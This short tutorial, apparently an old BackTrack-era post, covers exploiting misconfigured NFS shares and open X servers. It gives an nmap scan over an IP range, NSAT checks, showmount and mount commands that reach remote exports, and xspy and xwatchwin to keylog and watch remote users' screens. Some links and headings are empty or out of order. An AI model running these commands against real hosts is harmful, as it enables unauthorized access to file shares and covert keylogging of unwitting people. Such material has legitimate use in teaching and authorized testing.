In order to exploit NFS shares and X window configurations, you first need to perform a nmap scan looking for their corresponding ports. Example:
Go through your scan results and look for IP's with these ports open. If you find some, then we can try to take advantage of them.
nmap -P0 -sS -p 2049,6000,6001,6002,6003,6004,6005 -iL iprange.txt
Now, we use the NSAT tool to determine if they are misconfigured. You can get the tool here:
Once the tool is installed, you need rpc.nfsd. I installed the nfs-utils-1.1.2-2.fc9.i386.tar package to get this dependency (maybe the final BT3 will have it?).
NFS (port 2049):
X (port 6000-6005):
showmount -e 192.168.x.x
Export list for 192.168.x.x:
mount 192.168.x.x:/ mnt/temp
This should provide you keylogging of the remote computer. There are other tools for viewing the remote desktop, xwatchwin and xwd, but the install process in Backtrack is time consuming (and I dont remember where I got the dependencies). However, if you have Ubuntu, you can do apt-get install xwatchwin. Run it against one of your vulnerable IP's and see what the remote user is doing in real time.
nsat -C nsat_x.conf -f X_hosts.txt -n
xspy -display 192.168.x.x:0